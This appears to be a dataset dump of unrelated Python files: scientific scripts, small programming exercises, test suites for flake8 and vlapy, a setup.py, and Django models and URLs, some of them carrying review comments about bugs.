    # NOTE(review): output filename contains a space by design of the original
    f = open('Guide Sequences.txt','w')
    for i in range(len(PAMSequences[0])):
        f.write(PAMSequences[0][i]) # Prints the header sequence into the file.
        f.write('\n')
        print(PAMSequences[0][i])
        for j in range(len(PAMSequences[1][i])):
            if j == 0:
                # section banner, written once before the first hit
                f.write("Forward Strand PAM Sites:")
                f.write('\n')
                print("Forward Strand PAM Sites:")
            print(PAMSequences[1][i][j]) # Prints the forward sequences
            y = str(PAMSequences[1][i][j]) # Changes from int to string characters.
            x = ''.join(y) # Joining all the string values so we can print to file.
            f.write(x) # Write the joined forward sequences to the file.
            f.write('\n')
        for k in range(len(PAMSequences[2][i])): # For reverse sequences, and follows same logic as forward.
            if k == 0:
                f.write("Reverse Strand PAM Sites (in reference to the Top Strand Position):")
                f.write('\n')
                print("Reverse Strand PAM Sites (in reference to the Top Strand Position):")
            print(PAMSequences[2][i][k]) # Prints the reverse sequences with the corresponding positions.
            a = str(PAMSequences[2][i][k]) # Changes the integer to string characters, allowing for the values to join.
            b = ''.join(a)
            f.write(b) # Write all of the reverse sequences onto the text file with their positions.
            f.write('\n')
    f.close() # Close the file.
main()
|
994,958 | 5de5703137f9bd6fe9c9c192bad5700e4512a6cd | import setuptools
# Package version; also used to build the GitHub download_url tarball link.
version = '1.0.0'
setuptools.setup(
    name='Mtns electrumX',
    version=version,
    # command-line entry scripts installed alongside the package
    scripts=['electrumx_server', 'electrumx_rpc', 'electrumx_compact_history'],
    python_requires='>=3.6',
    install_requires=['aiorpcX>=0.10.1,<0.11', 'attrs',
                      'plyvel', 'pylru', 'aiohttp >= 2'],
    # optional feature groups: alternative DB backend, event loop, and
    # per-coin hash algorithm implementations
    extras_require={
        'rocksdb': ['python-rocksdb>=0.6.9'],
        'uvloop': ['uvloop>=0.12.2'],  # Bump when the uvloop connection_lost bug is fixed
        # For various coins
        'blake256': ['blake256>=0.1.1'],
        'crypto': ['pycryptodomex>=3.8.1'],
        'groestl': ['groestlcoin-hash>=1.0.1'],
        'tribus-hash': ['tribus-hash>=1.0.2'],
        'xevan-hash': ['xeven-hash'],
        'x11-hash': ['x11-hash>=1.4'],
        'zny-yespower-0-5': ['zny-yespower-0-5'],
        'mtns_skein_hash': ['mtns_skein-hash'],
    },
    packages=setuptools.find_packages(include=('electrumx*',)),
    description='ElectrumX MTNS Server',
    author='mtnsdev',
    author_email='git@omotenashicoin.site',
    license='MIT Licence',
    url='https://github.com/omotenashicoin-project/electrumx.git',
    long_description='Server implementation for the Electrum protocol',
    download_url=('https://github.com/omotenashicoin-project/electrumx/archive/'
                  f'{version}.tar.gz'),
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Framework :: AsyncIO',
        'License :: OSI Approved :: MIT License',
        'Operating System :: Unix',
        "Programming Language :: Python :: 3.6",
        "Topic :: Database",
        'Topic :: Internet',
    ],
)
|
994,959 | 4de48e3bf481c00ce0107245879c0e1b79c4d0a8 | from blog import app
from blog.views import socketio
# Run the Flask app through Flask-SocketIO's server so websockets work.
if __name__ == '__main__':
    socketio.run(app, debug=True)  # debug=True: development only (auto-reload)
994,960 | a7a7252cd0685c9ee7ed5989990b4aa30a5e627b | #5. Реализовать структуру «Рейтинг», представляющую собой не возрастающий набор натуральных чисел.
# У пользователя необходимо запрашивать новый элемент рейтинга.
# Если в рейтинге существуют элементы с одинаковыми значениями, то новый элемент с тем же значением должен разместиться после них.
# Подсказка. Например, набор натуральных чисел: 7, 5, 3, 3, 2.
# Пользователь ввел число 3. Результат: 7, 5, 3, 3, 3, 2.
# Пользователь ввел число 8. Результат: 8, 7, 5, 3, 3, 2.
# Пользователь ввел число 1. Результат: 7, 5, 3, 3, 2, 1.
# Набор натуральных чисел можно задать непосредственно в коде, например, my_list = [7, 5, 3, 3, 2].
# "Rating": a non-increasing list of naturals.  Per the task statement above,
# a new element equal to existing ones must be inserted AFTER them, and an
# element smaller than everything goes to the END of the list.
rating = [7 , 5 , 3 , 3 , 3 , 2]
inserted = False  # set True once the new element has been placed
new_element = int(input('Введите новый элемент рейтинга: '))
for element in rating[:]:
    # strictly greater: insert before the first SMALLER value, so equal
    # values stay ahead of the new one (old ``>=`` put it before its equals)
    if new_element > element:
        rating.insert(rating.index(element) , new_element)
        inserted = True
        break
if not inserted:
    # new element is <= every existing one: append at the tail
    # (old code wrongly inserted it at position 0)
    rating.append(new_element)
print(rating)
|
994,961 | 93a60102cb77330840e8df8874eccbee35892436 | import math
primes = {}  # memo of integers already proven prime


def is_prime(n):
    """Return True iff ``n`` is prime.

    Trusts the module-level ``primes`` memo for earlier hits.  Fixed to
    reject n < 2 (the old trial-division fallthrough returned True for
    0, 1 and negatives because ``all()`` of an empty range is True).
    """
    if primes.get(n, False):
        return True
    if n < 2:
        return False
    if n % 2 == 0 and n > 2:
        return False
    # odd trial divisors up to sqrt(n); empty range (n = 2, 3) -> True
    return all(n % i for i in range(3, int(math.sqrt(n)) + 1, 2))
# NOTE(review): Python 2 syntax (raw_input, print statement).
# For each of t test cases, read "start end" and print the number of
# NON-primes in [start, end]: count begins at the interval size and is
# decremented once per prime found.
t = int(raw_input())
while t > 0:
    input_range = raw_input()
    start = int(input_range.split(' ')[0])
    end = int(input_range.split(' ')[1])
    count = end - start + 1
    while start <= end:
        if is_prime(start) == True:
            # memoize the prime for later test cases
            primes.update({start: True})
            count = count - 1
        start = start + 1
    print count
    t = t - 1
994,962 | d96dec24cfbb34b44400996158f095a3836b5329 | import random
from Save import Save
class Word:
    """Vocabulary trainer backed by a remote JSON store (``Save``).

    ``self.dico`` maps a German word to ``[french, right_count, wrong_count]``.
    Every mutation re-uploads the entire dictionary.
    """
    def __init__(self):
        """Initialisation: download the actual version of data.json
        """
        d = Save("")
        self.dico = d.download()
    def getDico(self):
        # accessor kept for Save round-trips below
        return self.dico
    def pickWord(self):
        """Return a random (key, [translation, right, wrong]) pair."""
        print("A Word is picked")
        key = random.choice(list(self.dico))
        return key ,self.dico[key]
    def compareWord(self,key,word):
        """Fuzzy-compare ``word`` against the stored translation of ``key``.

        Accepts the answer when at most 2 characters differ position-wise.
        NOTE(review): indexes the stored word by positions of the guess --
        a guess LONGER than the stored word raises IndexError; confirm.
        """
        word = word.lower()
        counter = 0
        for letter in range(len(word)):
            if self.dico[key][0][letter] == word[letter]:
                counter += 1
        if counter >= len(self.dico[key][0])-2:
            return True
        else:
            return False
    def updateWord(self,word,point):
        """Increment the right (point=True) or wrong counter, then re-upload."""
        word = word.lower()
        if point:
            self.dico[word][1] += 1
        else:
            self.dico[word][2] += 1
        d = Save(self.getDico())
        d.upload()
    def deleteWord(self,word):
        """Remove ``word`` if present; the upload happens either way."""
        word = word.lower()
        try:
            self.dico.pop(word)
        except KeyError:
            print("Word does not exist on database")
            pass
        d = Save(self.getDico())
        d.upload()
    def newWord(self,de,fr):
        """Add a new German->French pair with zeroed counters; re-upload."""
        de = de.lower()
        fr = fr.lower()
        print("New Word learned: {} for {}".format(de,fr))
        try:
            if self.dico[de]:
                # existing entry: keep it untouched
                print("Word Already Exist")
                pass
        except KeyError:
            print("Creating New Word")
            self.dico[de] = [fr,0,0]
        d = Save(self.getDico())
        d.upload()
|
994,963 | edfae257380c9d8dbc5c2d4814bf9a067b005afe | # MIT License
#
# Copyright (c) 2020 Archis Joglekar
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from vlapy.core import field
import numpy as np
def test_field_solver():
    """Check field.solve_for_field against analytic antiderivatives.

    For each sinusoidal charge density, the expected electric field is the
    corresponding closed-form integral; the solver works in k-space, so
    agreement is checked to 4 decimals on a cell-centered periodic grid.
    """
    nx = 96
    kx_pert = 0.25
    xmax = 2 * np.pi / kx_pert  # one full period of the fundamental mode
    dx = xmax / nx
    # cell-centered spatial axis and matching FFT wavenumbers
    axis = np.linspace(dx / 2, xmax - dx / 2, nx)
    kx = np.fft.fftfreq(axis.size, d=dx) * 2.0 * np.pi
    charge_densities = [
        1.0 + np.sin(kx_pert * axis),
        1.0 + np.cos(2 * kx_pert * axis),
        1.0 + np.sin(2 * kx_pert * axis) + np.cos(8 * kx_pert * axis),
    ]
    # analytic fields: each term integrated once (divided by its wavenumber)
    electric_fields = [
        np.cos(kx_pert * axis) / kx_pert,
        -np.sin(2 * kx_pert * axis) / 2.0 / kx_pert,
        np.cos(2 * kx_pert * axis) / 2.0 / kx_pert
        - np.sin(8 * kx_pert * axis) / 8.0 / kx_pert,
    ]
    for actual_field, charge_density in zip(electric_fields, charge_densities):
        # solver receives (1 - density); sign convention per vlapy.core.field
        test_field = field.solve_for_field(charge_density=1.0 - charge_density, kx=kx)
        np.testing.assert_almost_equal(actual_field, test_field, decimal=4)
|
994,964 | 18cad137f850c4b166ce5940b87cc68683eeed82 | INSERT_DATA_NUM = 1000 # develop_modeでinsertする数
MAX_QUERY_SIZE = 500_000  # upper bound on query payload size in bytes (500 KB)
MAX_SELECT_RECORD = 500  # maximum rows fetched by a single SELECT
MAX_MECAB_PARSE_NUM = 500  # upper bound on MeCab parse invocations (500 calls)
|
994,965 | b41f0aef3baed287772a5e311b9a360bf600e7aa | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 25 21:16:25 2017
@author: User
"""
from docx import Document
def createTable():
    """Create a .docx with a 9x9 table, put 'work' in row 0 / col 1, save it."""
    doc = Document()
    table = doc.add_table(rows=9,cols = 9)
    cell = table.cell(0,1)
    cell.text = "work"
    # NOTE(review): hard-coded Windows drive path; fails on other machines
    doc.save("F:/test.docx")
createTable()
994,966 | 9f4861a026de8658bb790e5536c2c419c290587c | from homeassistant.components.hive import * |
994,967 | fbcb63f7b5f354b57e8806c18d163158b1d9d1ba | #Linear metadata model for testing purposes
from comet_ml import Experiment
import tensorflow as tf
from DeepTreeAttention.trees import AttentionModel
from DeepTreeAttention.models import metadata
from DeepTreeAttention.callbacks import callbacks
import pandas as pd
# Build the tree-attention model from its YAML config.
model = AttentionModel(config="/home/b.weinstein/DeepTreeAttention/conf/tree_config.yml")
model.create()
#Log config
experiment = Experiment(project_name="neontrees", workspace="bw4sz")
experiment.log_parameters(model.config["train"])
experiment.log_parameters(model.config["evaluation"])
experiment.log_parameters(model.config["predict"])
experiment.add_tag("HSI")
##Train
#Train see config.yml for tfrecords path with weighted classes in cross entropy
model.read_data()
class_weight = model.calc_class_weight()
##Train subnetwork
experiment.log_parameter("Train subnetworks", True)
with experiment.context_manager("HSI_spatial_subnetwork"):
    print("Train HSI spatial subnetwork")
    model.read_data(mode="HSI_submodel")
    # class_weight repeated once per submodel output head
    model.train(submodel="spatial", sensor="hyperspectral",class_weight=[class_weight, class_weight, class_weight], experiment=experiment)
with experiment.context_manager("HSI_spectral_subnetwork"):
    print("Train HSI spectral subnetwork")
    model.read_data(mode="HSI_submodel")
    model.train(submodel="spectral", sensor="hyperspectral", class_weight=[class_weight, class_weight, class_weight], experiment=experiment)
#Train full model
with experiment.context_manager("HSI_model"):
    experiment.log_parameter("Class Weighted", True)
    model.read_data(mode="HSI_train")
    model.train(class_weight=class_weight, sensor="hyperspectral", experiment=experiment)
    # NOTE(review): ``save_dir`` is never defined in this script -- this line
    # raises NameError as written; confirm where save_dir should come from.
    model.HSI_model.save("{}/HSI_model.h5".format(save_dir))
#Get Alpha score for the weighted spectral/spatial average. Higher alpha favors spatial network.
if model.config["train"]["HSI"]["weighted_sum"]:
    estimate_a = model.HSI_model.get_layer("weighted_sum").get_weights()
    experiment.log_metric(name="spatial-spectral weight", value=estimate_a[0][0])
994,968 | eff7e3f450310e9c7dfb62b0d148fcffc964ffea | """Tests for the flake8.style_guide.StyleGuide class."""
from __future__ import annotations
import argparse
from unittest import mock
import pytest
from flake8 import statistics
from flake8 import style_guide
from flake8 import utils
from flake8.formatting import base
def create_options(**kwargs):
    """Build an argparse.Namespace pre-filled with flake8 option defaults.

    Any keyword supplied by the caller overrides the corresponding default;
    unrelated keywords pass straight through to the namespace.
    """
    defaults = {
        "select": [],
        "extended_default_select": [],
        "extended_default_ignore": [],
        "extend_select": [],
        "ignore": [],
        "extend_ignore": [],
        "disable_noqa": False,
        "enable_extensions": [],
        "per_file_ignores": [],
    }
    for option_name, default_value in defaults.items():
        kwargs.setdefault(option_name, default_value)
    return argparse.Namespace(**kwargs)
def test_handle_error_does_not_raise_type_errors():
    """handle_error accepts str/int arguments without raising TypeError and
    reports the selected T111 violation (return value 1 == one error)."""
    formatter = mock.create_autospec(base.BaseFormatter, instance=True)
    guide = style_guide.StyleGuide(
        create_options(select=["T111"], ignore=[]),
        formatter=formatter,
        stats=statistics.Statistics(),
    )
    assert 1 == guide.handle_error(
        "T111", "file.py", 1, 1, "error found", "a = 1"
    )
def test_style_guide_manager():
    """Verify how the StyleGuideManager creates a default style guide."""
    formatter = mock.create_autospec(base.BaseFormatter, instance=True)
    options = create_options()
    guide = style_guide.StyleGuideManager(options, formatter=formatter)
    assert guide.default_style_guide.options is options
    # no per-file-ignores configured -> only the single default guide exists
    assert len(guide.style_guides) == 1
# Raw ``--per-file-ignores`` entries ("pattern:codes") shared by the
# StyleGuideManager tests below.
PER_FILE_IGNORES_UNPARSED = [
    "first_file.py:W9",
    "second_file.py:F4,F9",
    "third_file.py:E3",
    "sub_dir/*:F4",
]
@pytest.mark.parametrize(
    "style_guide_file,filename,expected",
    [
        ("first_file.py", "first_file.py", True),
        ("first_file.py", "second_file.py", False),
        ("sub_dir/*.py", "first_file.py", False),
        ("sub_dir/*.py", "sub_dir/file.py", True),
        ("sub_dir/*.py", "other_dir/file.py", False),
    ],
)
def test_style_guide_applies_to(style_guide_file, filename, expected):
    """Verify that we match a file to its style guide (exact name or glob)."""
    formatter = mock.create_autospec(base.BaseFormatter, instance=True)
    options = create_options()
    guide = style_guide.StyleGuide(
        options,
        formatter=formatter,
        stats=statistics.Statistics(),
        filename=style_guide_file,
    )
    assert guide.applies_to(filename) is expected
def test_style_guide_manager_pre_file_ignores_parsing():
    """Verify per-file-ignores parsing creates one sub-guide per pattern
    (default guide plus four pattern guides, paths normalized)."""
    formatter = mock.create_autospec(base.BaseFormatter, instance=True)
    options = create_options(per_file_ignores=PER_FILE_IGNORES_UNPARSED)
    guide = style_guide.StyleGuideManager(options, formatter=formatter)
    assert len(guide.style_guides) == 5
    expected = [
        utils.normalize_path(p)
        for p in [
            "first_file.py",
            "second_file.py",
            "third_file.py",
            "sub_dir/*",
        ]
    ]
    # index 0 is the default guide; the rest mirror the configured patterns
    assert expected == [g.filename for g in guide.style_guides[1:]]
@pytest.mark.parametrize(
    "ignores,violation,filename,handle_error_return",
    [
        (["E1", "E2"], "F401", "first_file.py", 1),
        (["E1", "E2"], "E121", "first_file.py", 0),
        (["E1", "E2"], "F401", "second_file.py", 0),
        (["E1", "E2"], "F401", "third_file.py", 1),
        (["E1", "E2"], "E311", "third_file.py", 0),
        (["E1", "E2"], "F401", "sub_dir/file.py", 0),
    ],
)
def test_style_guide_manager_pre_file_ignores(
    ignores, violation, filename, handle_error_return
):
    """Verify violations are reported (1) or suppressed (0) according to
    the combination of global ignores and the per-file ignore patterns."""
    formatter = mock.create_autospec(base.BaseFormatter, instance=True)
    options = create_options(
        ignore=ignores,
        select=["E", "F", "W"],
        per_file_ignores=PER_FILE_IGNORES_UNPARSED,
    )
    guide = style_guide.StyleGuideManager(options, formatter=formatter)
    assert (
        guide.handle_error(violation, filename, 1, 1, "Fake text")
        == handle_error_return
    )
@pytest.mark.parametrize(
    "filename,expected",
    [
        ("first_file.py", utils.normalize_path("first_file.py")),
        ("second_file.py", utils.normalize_path("second_file.py")),
        ("third_file.py", utils.normalize_path("third_file.py")),
        ("fourth_file.py", None),
        ("sub_dir/__init__.py", utils.normalize_path("sub_dir/*")),
        ("other_dir/__init__.py", None),
    ],
)
def test_style_guide_manager_style_guide_for(filename, expected):
    """Verify the style guide selection function."""
    formatter = mock.create_autospec(base.BaseFormatter, instance=True)
    options = create_options(per_file_ignores=PER_FILE_IGNORES_UNPARSED)
    guide = style_guide.StyleGuideManager(options, formatter=formatter)
    file_guide = guide.style_guide_for(filename)
    # unmatched files fall back to the default guide, whose filename is None
    assert file_guide.filename == expected
994,969 | 637c3058235ef8e34a5263f4e074fe6eb73f1c31 | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 20 10:52:29 2019
HW9
@author: tianminz
"""
import math
def alternatingSum(lst, depth = 0):
    """Return lst[0] - lst[1] + lst[2] - lst[3] + ... (0 for an empty list).

    ``depth`` is unused; retained for signature compatibility.
    """
    if not lst:
        return 0
    if len(lst) == 1:
        return lst[0]
    first, second, *rest = lst
    return first - second + alternatingSum(rest)
def binarySearchValues(lst, item, low = 0):
    """Return the (index, value) pairs a binary search inspects while
    verifying whether ``item`` is in sorted ``lst``.

    Indices are absolute positions in the original list; ``low`` carries
    the offset of the current slice through the recursion.
    """
    if not lst:
        return []
    mid = (len(lst) - 1) // 2
    visited = [(low + mid, lst[mid])]
    if item == lst[mid]:
        return visited
    if item < lst[mid]:
        # search the left half; offset unchanged
        return visited + binarySearchValues(lst[:mid], item, low)
    # search the right half; offset skips past the midpoint
    return visited + binarySearchValues(lst[mid + 1:], item, low + mid + 1)
def findCategoryPath(d, value):
    """Depth-first search the nested dict ``d`` for ``value``.

    Returns the list of keys leading to the value, or None when the
    value does not occur anywhere as a leaf.
    """
    for key, child in d.items():
        if isinstance(child, dict):
            sub_path = findCategoryPath(child, value)
            if sub_path is not None:
                return [key] + sub_path
        elif child == value:
            return [key]
    return None
#returns a list of the positive powers of 3 up to and including n
def powersOf3ToN(n):
    """Return [3**0, 3**1, ...] for every power of 3 <= floor(n).

    Returns [] when floor(n) < 1.  The recursion computes the smaller
    result ONCE -- the original called powersOf3ToN(value//3) twice per
    level, making the running time exponential in the recursion depth.
    """
    value = math.floor(n)
    #corner case
    if value <= 0:
        return []
    elif value < 3:
        return [1]
    #recursive case: 3**k <= value  iff  3**(k-1) <= value // 3
    else:
        smaller = powersOf3ToN(value // 3)
        return smaller + [smaller[-1] * 3]
# NOTE(review): the following hand-expansion traces of powersOf3ToN were left
# as live top-level code; the last lines were syntactically invalid
# (dangling ``+`` and mismatched brackets) and broke the whole module at
# import time.  Preserved here as comments.
# powersOf3ToN(30)
# powersOf3ToN(10) + [powersOf3ToN(10) [-1] * 3]
# powersOf3ToN(3) + [powersOf3ToN(3) [-1] * 3] + [( powersOf3ToN(3) + [powersOf3ToN(3) [-1] * 3] ) [-1] * 3]
# powersOf3ToN(1) + [powersOf3ToN(1) [-1] * 3] + [ ( powersOf3ToN(1) + [powersOf3ToN(1) [-1] * 3] ) [-1] * 3]
# [1] + [3] + ...
def loadBalance(lst):
    """Greedily split ``lst`` into two lists with totals as close as possible.

    Sorts ``lst`` in place, then deals elements largest-first onto
    whichever side currently has the smaller total (ties favor the first
    side).  Returns the pair of lists; ``lst`` is consumed (emptied) when
    it has two or more elements.
    """
    lst.sort()
    if not lst:
        return [], []
    if len(lst) == 1:
        return lst, []
    side_a, side_b = [], []
    while lst:
        largest = lst.pop()
        target = side_b if sum(side_a) > sum(side_b) else side_a
        target.append(largest)
    return side_a, side_b
def generateValidParentheses(n):
    """Return the set of balanced parenthesis strings using exactly ``n``
    parentheses; odd or zero ``n`` yields the empty set."""
    if n == 0 or n % 2 == 1:
        return set()
    found = set()
    genParents(found, n / 2, n / 2, "")
    return found
def genParents(out, left, right, src):
    """Backtracking helper: ``left``/``right`` count the '(' and ')'
    still available; finished strings are added to ``out``."""
    if left == 0 and right == 0:
        out.add(src)
        return
    if left > 0:
        genParents(out, left - 1, right, src + "(")
    # a ')' is legal only while there is an unmatched '(' (right > left)
    if right > left:
        genParents(out, left, right - 1, src + ")")
# test function
def testalternatingSum():
    """Spot-check alternatingSum on mixed, empty, and long inputs."""
    print("Testing alternatingSum...")
    assert(alternatingSum([1,2,3,4,5]) == 3)
    assert(alternatingSum([1,7,3,10,0]) == -13)
    assert(alternatingSum([11,71,3,1,20]) == -38)
    assert(alternatingSum([11,71,3,1,20,18,3,4,29,20]) == -48)
    assert(alternatingSum([]) == 0)
    return "Done..."
def testbinarySearchValues():
    """Check the visited (index, value) traces for hit and miss searches."""
    print("Testing binarySearchValues...")
    assert(binarySearchValues(['a', 'c', 'f', 'g', 'm', 'q'], 'c')\
        == [(2, 'f'), (0, 'a'), (1, 'c')])
    assert(binarySearchValues(['a', 'c', 'f', 'g', 'm', 'q'], 'n')\
        == [(2, 'f'), (4, 'm'), (5, 'q')])
    assert(binarySearchValues(['a', 'c', 'f', 'g', 'm', 'q'], 'g') \
        == [(2, 'f'), (4, 'm'), (3, 'g')])
    return "Done..."
def testfindCategoryPath():
    """Exercise findCategoryPath on a nested dog-breed taxonomy; values are
    dog names, so searching for a KEY (e.g. 'Weimaraner') must yield None."""
    d = { "Sporting" :
            { "Spaniel" :
                { "English Springer" : "Betsy" },
              "Weimaraner" : "Xeva",
              "Retriever" :
                { "Golden" : "Sammo",
                  "Labrador" : "Nya" }
            },
          "Working" :
            { "Husky" : "Stella",
              "Saint Bernard" : "Rutherfurd",
              "Boxer" : "Paximus" },
          "Herding" :
            { "Corgi" :
                { "Welsh" :
                    { "Cardigan" : "Geb",
                      "Pembroke" : "Niinja" }
                },
              "Sheepdog" :
                { "Bergamasco" : "Samur",
                  "Old English" : "Duggy",
                  "Shetland" : "Walker" }
            },
          "Other" : "Kimchee"
        }
    assert(findCategoryPath(d, "Samur") \
        == ["Herding", "Sheepdog", "Bergamasco"])
    assert(findCategoryPath(d, "Weimaraner") == None)
    return "Done..."
def testloadBalance():
    """Check loadBalance splits a sample list into two near-equal halves.

    The original ``assert(A == X or Y)`` could never fail: when the
    comparison was False the expression evaluated to the truthy tuple Y.
    Compare against each acceptable split explicitly instead, including
    the split the greedy implementation actually produces.
    """
    print("Testing loadBalance...")
    result = loadBalance([3, 6, 1, 7, 9, 8, 22, 3])
    assert result in (([3, 6, 1, 7, 9, 3], [8, 22]),
                      ([3, 6, 9, 8, 3], [1, 7, 22]),
                      ([22, 6, 1], [9, 8, 7, 3, 3]))
    return "Done..."
def testpowerOf3ToN():
    """Check powersOf3ToN on a float bound, an exact power, and a miss."""
    print("Testing powerOf3ToN...")
    assert(powersOf3ToN(10.5) == [1, 3, 9])
    assert(powersOf3ToN(2187) == [1, 3, 9, 27, 81, 243, 729, 2187])
    assert(powersOf3ToN(2000) == [1, 3, 9, 27, 81, 243, 729])
    return "Done..."
def testgenerateValidParentheses():
    """Check generateValidParentheses for n = 4, 6, and the empty case."""
    print("Testing generateValidParentheses...")
    assert(generateValidParentheses(4) == { "(())", "()()" })
    assert(generateValidParentheses(6) == \
        { "((()))", "()(())", "(())()", "(()())", "()()()" })
    assert(generateValidParentheses(0) == set())
    return "Done..."
def testAll():
    """Run every test function and print its 'Done...' result."""
    print(testalternatingSum())
    print(testbinarySearchValues())
    print(testfindCategoryPath())
    print(testloadBalance())
    print(testpowerOf3ToN())
    print(testgenerateValidParentheses())
testAll()
|
994,970 | 618fafce5450ed0894b14de04bdf4eeb1a64a128 | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.conf import settings
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.contrib.auth.models import UserManager
class Tasks(models.Model):
    """Issue-tracker task created by a user and assigned to an executor.

    NOTE(review): field name ``tittle`` is a typo for ``title`` but is kept --
    renaming would require a schema migration and break callers.
    """
    tittle = models.CharField('Заголовок', max_length=75, unique=True)
    type = models.CharField('Тип', max_length=5)
    priority = models.CharField('Приоритет', max_length=15)
    text = models.TextField('Описание')
    status = models.CharField('Статус', max_length=40)
    datetime_create = models.DateTimeField('Дата создания', auto_now_add=True)
    datetime_update = models.DateTimeField('Дата изменения', auto_now=True)
    creator = models.ForeignKey('Users', on_delete=models.CASCADE)
    # NOTE(review): default=None on a non-null CharField -- saving without an
    # executor will fail the NOT NULL constraint; confirm null=True intent.
    executor = models.CharField('Исполнитель', max_length=60, default=None)
    def __str__(self):
        return self.tittle
class Users(AbstractBaseUser):
    """Custom user model authenticated by username.

    NOTE(review): redeclaring ``password`` with max_length=30 shadows
    AbstractBaseUser's 128-char field -- Django's hashed passwords will not
    fit in 30 characters; confirm this override is intentional.
    """
    role = models.CharField('Роль', max_length=40, default='Разработчик')
    username = models.CharField('Имя пользователя', max_length=40, unique=True)
    password = models.CharField('Пароль', max_length=30)
    USERNAME_FIELD = 'username'
    REQUIRED_FIELDS = []
    objects = UserManager()
    def __str__(self):
        return self.username
# Automatically issue a DRF auth token for every newly created user.
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
    if created:
        Token.objects.create(user=instance)
|
994,971 | 1f29abbf191750ff5f1cedbd9acea7917dfc9001 | import numpy as np
import math
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Circle
import scipy
from mpl_toolkits.mplot3d import Axes3D
import time
from camera_capture import get_image
from velodyne_capture_v3 import init_velo_socket, get_pointcloud
import socket
def minmax_scale(x, i_min, i_max, o_min, o_max):
    """Linearly remap ``x`` from the range [i_min, i_max] to [o_min, o_max]."""
    ratio = (x - i_min) / float(i_max - i_min)
    return ratio * (o_max - o_min) + o_min
def get_calibration(pcl):
    """Project a velodyne point cloud onto image coordinates.

    Applies fixed extrinsic rotations (xr/yr/zr), a translation T, and an
    intrinsics-like matrix F to the XYZ columns of ``pcl``; returns the
    resulting matrix of projected coordinates.
    NOTE(review): column 3 is read into ``distance`` but never used here,
    and it stays local -- the module-level code below expects a global
    ``distance`` that this function does not provide.
    """
    X= pcl[:,0]
    Y= pcl[:,1]
    Z= pcl[:,2]
    distance = pcl[:,3]
    # For matrix values
    xr = 95 * math.pi/180
    yr = 10 * math.pi/180
    zr = 0 * math.pi/180
    # start z by 90 y by -90
    Xr = np.matrix([[1,0,0],[0,math.cos(xr),-1*math.sin(xr)],[0,math.sin(xr),math.cos(xr)]])
    Yr = np.matrix([[math.cos(yr),0,math.sin(yr)],[0,1,0],[-1*math.sin(yr),0,math.cos(yr)]])
    Zr = np.matrix([[math.cos(zr),-1*math.sin(zr),0],[math.sin(zr),math.cos(zr),0],[0,0,1]])
    F = np.matrix([[935,0,0],[0,935,0],[225,375,1]])
    #rotation matrix
    R = np.matmul(Zr,Yr)
    R= np.matmul(R,Xr)
    # transpose matric
    T = np.matrix([[1.1],[0],[-1.32]])
    size= len(X)
    X1= np.matrix.transpose(X)
    Y1= np.matrix.transpose(Y)
    Z1= np.matrix.transpose(Z)
    # NOTE(review): first assignment to A is immediately overwritten
    A=[X1,Y1,Z1]
    A= np.matrix([X1,Y1 ,Z1])
    T1=np.matrix.transpose(T)
    T2= np.repeat(T1,size,axis=0)  # broadcast the translation to all points
    T2= np.matrix.transpose(T2)
    c2 = np.matmul((F), (R))
    c2 = .25*np.matmul((c2),(A+T2))
    return c2
# Grab a point cloud over UDP, project it, and highlight the point closest
# to a fixed pixel center, colored by distance.
PORT = 2368  # standard velodyne data port
soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
soc.bind(('', PORT))
pcl = get_pointcloud(soc)
c2 = get_calibration(pcl)
xcenter = 307
ycenter = 207
# squared pixel distance of every projected point to the target center
B = np.square((c2[0,:]-xcenter)) + np.square((c2[1,:]-ycenter))
index = int(np.argmin(B, axis=1))
cmap = plt.get_cmap('brg')
# NOTE(review): ``distance`` is local to get_calibration and never returned,
# so this line raises NameError as written -- confirm intended data source.
pointsDist = np.asarray(distance)
pointsDist = np.round(minmax_scale(1.0/pointsDist,1.0/75,1.0/1.5,1,255).astype('uint8'))
pointsColor = np.array([cmap(1.0-pdist/255.0)[:3] for pdist in pointsDist])
plt.scatter(np.asarray(c2[0,:]), np.asarray(c2[1,:]), s=0.5, c=pointsColor)
circ = Circle((c2[0,index],c2[1,index]), 5, color='red')
# NOTE(review): ``ax`` is never created (no fig, ax = plt.subplots()) --
# this also raises NameError; confirm the intended axes object.
ax.add_patch(circ)
print(distance[index])
plt.show()
994,972 | 838f26df45377b837270811b0b7c4330603bafa8 | from django.conf.urls import url
from .import views
from accounts.views import LandingPageView
from django.contrib.auth.views import login, logout, password_reset, password_reset_done
from django.contrib.auth import views as auth_views
# URL namespace for reversing, e.g. reverse('accounts:login').
app_name = 'accounts'
urlpatterns = [
    url(r'^$', LandingPageView.as_view(), name='landing_page'),
    # NOTE(review): function-based auth views (login/logout/password_reset)
    # were removed in Django 2.1 -- this module targets an older Django.
    url(r'^login$', login, {'template_name': 'accounts/login.html'}, name='login'),
    url(r'^logout$', logout, {'template_name': 'accounts/logout.html'}, name='logout'),
    url(r'^register$', views.register, name='register'),
    url(r'^profile$', views.profile, name='profile'),
    url(r'^profile/edit$', views.edit_profile, name='edit_profile'),
    url(r'^change-password$', views.change_password, name='change-password'),
